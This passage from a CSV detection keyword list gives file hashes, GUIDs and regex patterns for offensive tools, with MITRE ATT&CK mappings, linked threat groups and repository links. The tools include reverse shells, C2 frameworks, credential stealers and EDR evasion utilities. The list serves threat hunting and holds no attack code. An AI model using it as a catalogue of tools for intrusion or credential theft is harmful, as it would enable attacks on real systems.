"*205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602*",".{0,1000}205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23061" "*205adce8325494081e929d923abc6585ae541546172483dc147b6ffe48b4f7f6*",".{0,1000}205adce8325494081e929d923abc6585ae541546172483dc147b6ffe48b4f7f6.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","23062" "*205cbd1e78fffb666439a6bffd05c0486adcd36e0f237e80619edf8eaed9bf22*",".{0,1000}205cbd1e78fffb666439a6bffd05c0486adcd36e0f237e80619edf8eaed9bf22.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23063" "*2062837ed59e6bfda4b2b98be75c37f17e6f8e9dec7cce754609cd249b4d02e3*",".{0,1000}2062837ed59e6bfda4b2b98be75c37f17e6f8e9dec7cce754609cd249b4d02e3.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 
- TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","23065" "*20641907ff43e97a5b708e9a2a18db7673cd5583c507b84a4b506dae757e21ea*",".{0,1000}20641907ff43e97a5b708e9a2a18db7673cd5583c507b84a4b506dae757e21ea.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","23066" "*20674c56f95e970818056b474668a43c64db6c414065cd47db9a375128d1cb09*",".{0,1000}20674c56f95e970818056b474668a43c64db6c414065cd47db9a375128d1cb09.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23067" "*20749471886fbeb543555c1060694f64891eb0a41adae19f747b2c635b2a3a94*",".{0,1000}20749471886fbeb543555c1060694f64891eb0a41adae19f747b2c635b2a3a94.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","23069" "*20763b3e829f0226ebb2b7e192d8728f2e61a81bf5ee9d59da4c80a078ec087f*",".{0,1000}20763b3e829f0226ebb2b7e192d8728f2e61a81bf5ee9d59da4c80a078ec087f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - 
T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23070" "*2077c0c96383793ffa5b0843740f9b095688df5f5accd1a74c65f634bbc42358*",".{0,1000}2077c0c96383793ffa5b0843740f9b095688df5f5accd1a74c65f634bbc42358.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","23071" "*20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a*",".{0,1000}20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23072" "*208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037*",".{0,1000}208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23074" "*2083f424e0d3714f871c2bf8a4f8e38462b28caa43903c062c3df6a03ce8e679*",".{0,1000}2083f424e0d3714f871c2bf8a4f8e38462b28caa43903c062c3df6a03ce8e679.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - 
T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23075" "*2084e9586af146731e47db82e3ca1e97b50c63440d4ddf865248dc4740758c61*",".{0,1000}2084e9586af146731e47db82e3ca1e97b50c63440d4ddf865248dc4740758c61.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23076" "*208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7*",".{0,1000}208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23078" "*208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a*",".{0,1000}208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23079" 
"*209948811ece8dd5cff6fab03402232677c2625fad1272ddc964ed7869b46eeb*",".{0,1000}209948811ece8dd5cff6fab03402232677c2625fad1272ddc964ed7869b46eeb.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","23080" "*20b19292fa127311c14f893694a72b376d27b88c56ea2fb7b9fb816d9e0ab4d6*",".{0,1000}20b19292fa127311c14f893694a72b376d27b88c56ea2fb7b9fb816d9e0ab4d6.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","23083" "*20B3AA84-9CA7-43E5-B0CD-8DBA5091DF92*",".{0,1000}20B3AA84\-9CA7\-43E5\-B0CD\-8DBA5091DF92.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","#GUIDproject","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","23084" "*20b948d35e9e730e5aaa00f8de01107af773b93313fed752ae63afcd45353073*",".{0,1000}20b948d35e9e730e5aaa00f8de01107af773b93313fed752ae63afcd45353073.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","23085" "*20cd0aabd640797f04eaa5c121a282002871288efc8f4915dffd46f75bc21d71*",".{0,1000}20cd0aabd640797f04eaa5c121a282002871288efc8f4915dffd46f75bc21d71.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23088" "*20ceacaac5215e9a2e5bb82861f1391382fc7cb132c9c57f706b216f5f975b0d*",".{0,1000}20ceacaac5215e9a2e5bb82861f1391382fc7cb132c9c57f706b216f5f975b0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23090" "*20da3d2ca11e01644815a4f1d0b58fd8544cc03a7e1f5c863ff91700f04c2cbe*",".{0,1000}20da3d2ca11e01644815a4f1d0b58fd8544cc03a7e1f5c863ff91700f04c2cbe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23094" 
"*20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f*",".{0,1000}20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23095" "*20e9054570f81d5aa05864a0bcc292274f2bc48fb593ba26978ede76663c2b6f*",".{0,1000}20e9054570f81d5aa05864a0bcc292274f2bc48fb593ba26978ede76663c2b6f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23097" "*20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec*",".{0,1000}20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","23098" 
"*20ee05dd8552f0e3600b0d597d202e6d9baf1c1f30029d8a4773bb172016ce42*",".{0,1000}20ee05dd8552f0e3600b0d597d202e6d9baf1c1f30029d8a4773bb172016ce42.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","23099" "*20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f*",".{0,1000}20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23100" "*20fdeb79608d359d60a1eb6378197f23de9cca8e77e776086335a0cea0c972f2*",".{0,1000}20fdeb79608d359d60a1eb6378197f23de9cca8e77e776086335a0cea0c972f2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","23101" "*2103fd114d530753c7eadd8561d76ed952863c9d58a64ecf6b3abb160f863db1*",".{0,1000}2103fd114d530753c7eadd8561d76ed952863c9d58a64ecf6b3abb160f863db1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - 
TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","23102" "*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*",".{0,1000}210A3DB2\-11E3\-4BB4\-BE7D\-554935DCCA43.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","23104" "*21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500*",".{0,1000}21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23105" "*211446645fa7a934da99f218cc049cd1c59c68ac2a5da2033eaceff80b1d1c0e*",".{0,1000}211446645fa7a934da99f218cc049cd1c59c68ac2a5da2033eaceff80b1d1c0e.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","23106" 
"*2116E6C5-F609-4CA8-B1A1-E87B7BE770A4*",".{0,1000}2116E6C5\-F609\-4CA8\-B1A1\-E87B7BE770A4.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#GUIDproject","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","23107" "*211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda*",".{0,1000}211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23108" "*211A4598-B46E-4CD3-BA5A-1EC259D4DB5A*",".{0,1000}211A4598\-B46E\-4CD3\-BA5A\-1EC259D4DB5A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","23109" "*2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc*",".{0,1000}2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live 
or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23110" "*2136caf310bb8cefaffbe9fc97ec18efc8fee99c071dbdae5e18840c71632ce7*",".{0,1000}2136caf310bb8cefaffbe9fc97ec18efc8fee99c071dbdae5e18840c71632ce7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23113" "*2145f05e4090b6b0ef64720547ca85d7c4960b6fd91202a524f99ed832c0b54b*",".{0,1000}2145f05e4090b6b0ef64720547ca85d7c4960b6fd91202a524f99ed832c0b54b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23117" "*214adf5acd24740909da1a8ee95d629da354cbe23bc2b56d7edf610c84bd6a1d*",".{0,1000}214adf5acd24740909da1a8ee95d629da354cbe23bc2b56d7edf610c84bd6a1d.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","23120" "*214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25*",".{0,1000}214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - 
T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23121" "*2150D252-AA17-45C2-8981-A6DCF7055CA6*",".{0,1000}2150D252\-AA17\-45C2\-8981\-A6DCF7055CA6.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","23123" "*21533d1133ecac5dc01a087b7deea5f594b3609d64e96f8e83c3fe458454722c*",".{0,1000}21533d1133ecac5dc01a087b7deea5f594b3609d64e96f8e83c3fe458454722c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23124" "*2155d44b48c8495225b37a0ebdc72cfecfff3fa95cedf04205e416e4ef36c808*",".{0,1000}2155d44b48c8495225b37a0ebdc72cfecfff3fa95cedf04205e416e4ef36c808.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23125" "*21567af4f54a515da69211edfabdfda681dd5aa01263c80467394a5c19eee333*",".{0,1000}21567af4f54a515da69211edfabdfda681dd5aa01263c80467394a5c19eee333.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23127" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","23128" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","23129" "*21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32*",".{0,1000}21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23130" "*216244b421d1ebb05ea81496831a2893139d6e2329db77e39cd6a2dc08e703e8*",".{0,1000}216244b421d1ebb05ea81496831a2893139d6e2329db77e39cd6a2dc08e703e8.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","23131" "*216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79*",".{0,1000}216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23132" "*2164E6D9-6023-4932-A08F-7A5C15E2CA0B*",".{0,1000}2164E6D9\-6023\-4932\-A08F\-7A5C15E2CA0B.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","23133" "*216767025356ffaa54815bf698254810253efcd10feddfab82e7f6ed991d553c*",".{0,1000}216767025356ffaa54815bf698254810253efcd10feddfab82e7f6ed991d553c.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23135" "*2170a03a337a89bb3b6a02035ae85946815f8643897ded40fc0a2c29e2e5a960*",".{0,1000}2170a03a337a89bb3b6a02035ae85946815f8643897ded40fc0a2c29e2e5a960.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation 
